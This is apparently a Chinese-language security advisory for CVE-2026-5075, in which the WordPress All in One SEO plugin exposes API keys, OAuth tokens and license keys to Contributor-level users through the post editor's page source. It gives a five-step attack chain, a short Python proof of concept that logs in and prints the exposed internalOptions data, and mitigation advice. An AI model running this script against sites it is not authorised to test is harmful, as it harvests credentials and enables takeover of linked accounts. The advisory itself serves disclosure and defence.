CVE-2026-5075 CVSS 4.3 中危

CVE-2026-5075：WordPress All in One SEO 敏感信息泄露

披露日期: 2026-05-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5075

漏洞类型

敏感信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

WordPress All in One SEO 插件

漏洞概述

CVE-2026-5075影响WordPress All in One SEO插件4.9.7及以下版本。该漏洞源于插件在文章编辑器语境下，通过`wp_localize_script()`向低权限用户暴露了敏感的内部选项数据。具有投稿人及以上权限的攻击者可利用此漏洞，从页面源代码中查看API密钥、OAuth令牌及许可证信息，造成敏感信息泄露。

技术细节

该漏洞的核心在于权限校验缺失。WordPress All in One SEO插件在处理文章编辑器上下文时，错误地使用了`wp_localize_script()`函数，将包含API Key、OAuth Token及License Key等高敏感数据的`internalOptions`对象直接传递给前端JavaScript。代码逻辑未对当前用户角色进行有效区分，导致低权限用户（如投稿人）在进入编辑界面时，服务器将敏感数据原样输出到页面的`<script>`标签中。攻击者无需复杂的利用手段，只需登录并查看页面源代码，即可窃取这些关键凭据，进而可能接管关联的第三方服务账户或进行未授权操作。

攻击链分析

STEP 1

1. 获取低权限账户

攻击者注册或获取一个具有投稿人（Contributor）及以上权限的WordPress账户。

STEP 2

2. 登录后台

攻击者使用该账户登录WordPress管理后台。

STEP 3

3. 访问编辑页面

攻击者导航至新建或编辑文章的页面，触发插件加载编辑器脚本。

STEP 4

4. 查看页面源代码

攻击者使用浏览器查看网页源代码，搜索关键词'internalOptions'。

STEP 5

5. 提取敏感信息

攻击者从输出的JavaScript对象中复制API密钥、OAuth令牌等敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-5075
# It checks if sensitive data is exposed in the page source of the editor.

import requests

def check_cve(url, username, password):
    session = requests.Session()
    # Login attempt
    login_url = url + "/wp-login.php"
    payload = {'log': username, 'pwd': password, 'redirect_to': url + '/wp-admin/', 'testcookie': '1'}
    session.post(login_url, data=payload)
    
    # Access post editor
    edit_url = url + "/wp-admin/post-new.php"
    response = session.get(edit_url)
    
    if 'internalOptions' in response.text:
        print("[+] Vulnerability Detected: internalOptions found in source.")
        # Extract specific snippet for demonstration
        start = response.text.find('var internalOptions')
        print(response.text[start:start+200])
    else:
        print("[-] Vulnerability not detected or user lacks permissions.")

# Usage: check_cve('http://target-site.com', 'contributor', 'pass')

影响范围

All in One SEO Pack <= 4.9.7

防御指南

临时缓解措施

建议立即将插件升级至修复版本。若无法立即升级，应暂时撤销非必要用户的编辑权限，或限制对WordPress后台的访问。同时，强烈建议检查并重置所有可能已泄露的API密钥和许可证密钥。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表